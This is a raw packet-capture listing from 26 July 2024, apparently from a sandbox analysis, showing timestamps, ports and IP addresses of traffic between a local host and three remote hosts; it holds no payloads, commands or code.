Jul 26, 2024 13:02:58.728842974 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.728868961 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.761442900 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806135893 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806196928 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806229115 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806241989 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806257963 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806272030 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806289911 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806324959 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806339025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806349993 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806376934 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806421041 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806435108 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806448936 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806471109 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806583881 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806602955 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806617022 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806657076 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806792974 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806807995 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806849003 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806859016 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.806864023 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.806904078 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:01.508760929 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:01.508789062 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:01.508840084 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:01.512758017 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:01.512770891 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:02.410588026 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:02.410650015 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:02.420990944 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:02.421011925 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:02.421483040 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:02.478282928 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:02.524507046 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.321957111 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.329845905 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.329855919 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.329924107 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.329952955 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.329966068 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.330029011 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.330029011 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.330033064 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.330043077 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.330125093 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.330615044 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.330615044 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.332262039 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.332320929 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.332387924 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.332387924 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.332396984 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.333236933 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.337097883 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.337137938 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.337193966 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.337193966 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.337201118 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.337904930 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.342725039 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.342772007 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.342807055 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.342813969 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.342832088 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.343734980 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.344163895 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.344208002 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.344316006 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.344321966 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.344362974 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.344393969 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.345464945 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.345515013 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.345546007 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.345551968 CEST	443	49188	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:03.345571041 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:03.349253893 CEST	49188	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:04.393109083 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.398366928 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.398406982 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.398433924 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.398509979 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.407257080 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.407311916 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.407407045 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.407454014 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.407532930 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.407655954 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.407779932 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.407824993 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.412430048 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.412523985 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.412532091 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.412579060 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:04.412702084 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.412730932 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.412759066 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.412786007 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.414535999 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.415999889 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.417694092 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.418112993 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.419792891 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:03:04.419859886 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:03:07.440613031 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:07.440663099 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:07.440741062 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:07.441081047 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:07.441093922 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:08.144431114 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:08.147587061 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:08.147614956 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:08.898108959 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.013845921 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.013855934 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.013933897 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.013978958 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.013999939 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.014017105 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.014050007 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.014050007 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.014085054 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.014085054 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.015124083 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.015131950 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.015162945 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.015168905 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.015192032 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.015213966 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.015238047 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139533997 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139585972 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139621019 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139631987 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139632940 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139703035 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139731884 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139743090 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139749050 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139755964 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139770031 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139789104 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139810085 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139815092 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139818907 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139859915 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139877081 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139894009 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139904022 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139936924 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139945984 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139945030 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139971018 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.139993906 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.139997005 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.140034914 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.140049934 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.140064001 CEST	443	49189	93.113.54.56	192.168.2.22
Jul 26, 2024 13:03:09.140096903 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.140160084 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:09.141016006 CEST	49189	443	192.168.2.22	93.113.54.56
Jul 26, 2024 13:03:13.190435886 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:13.190469980 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:13.190548897 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:13.190967083 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:13.190978050 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.332393885 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.332472086 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.337162018 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.337177038 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.337440968 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.339812994 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.380512953 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.795890093 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.795931101 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.795963049 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.795981884 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.796010017 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.796022892 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.796051979 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.796186924 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.799159050 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.799201012 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.799221039 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.799227953 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.799252033 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.799277067 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.799283028 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.983319998 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.983366013 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.983387947 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.983418941 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.983431101 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.983441114 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.993767023 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993777990 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993818045 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993827105 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.993839979 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993868113 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993876934 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993896008 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.993901968 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993916035 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.993923903 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.993947029 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.994776011 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.994785070 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.994818926 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.994829893 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.994837046 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.994844913 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.994856119 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.994877100 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.995529890 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.995569944 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.995583057 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:14.995589018 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:14.995613098 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.167855978 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.167901993 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.167921066 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.167938948 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.167949915 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.167979002 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.169152021 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.169161081 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.169195890 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.169200897 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.169209003 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.169246912 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.169265032 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.169312000 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.169341087 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.169341087 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.169367075 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.171689987 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.171698093 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.171731949 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.171741009 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.171747923 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.171770096 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.171773911 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.171808004 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.175075054 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.175124884 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.175131083 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.175148964 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.175175905 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.195298910 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.195352077 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.195354939 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.195364952 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.195391893 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.265274048 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.265341997 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.265353918 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.265476942 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.265532970 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.265536070 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.265563011 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.265590906 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.352097988 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.352111101 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.352159023 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.352164984 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.352175951 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.352205992 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.352207899 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.352229118 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.352238894 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.354064941 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.354074955 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.354118109 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.354118109 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.354135036 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.354146957 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.354161978 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.354170084 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.356421947 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.356465101 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.356471062 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.356487989 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.356496096 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.356508017 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.356519938 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.358325958 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.358360052 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.358371973 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.358381033 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.358386040 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.358413935 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.362273932 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.362328053 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.362329960 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.362339020 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.362397909 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.365535975 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.365581036 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.365588903 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.365597963 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.365632057 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.365647078 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.371162891 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.371212959 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.371221066 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.371229887 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.371253967 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.373051882 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.373099089 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.373102903 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.373114109 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.373157024 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.378654003 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.378705978 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.378705978 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.378715992 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.378748894 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.463865042 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.463903904 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.463927031 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.463941097 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.463951111 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.463988066 CEST	49190	443	192.168.2.22	34.166.62.190
Jul 26, 2024 13:03:15.465161085 CEST	443	49190	34.166.62.190	192.168.2.22
Jul 26, 2024 13:03:15.465199947 CEST	443	49190	34.166.62.190	192.168.2.22
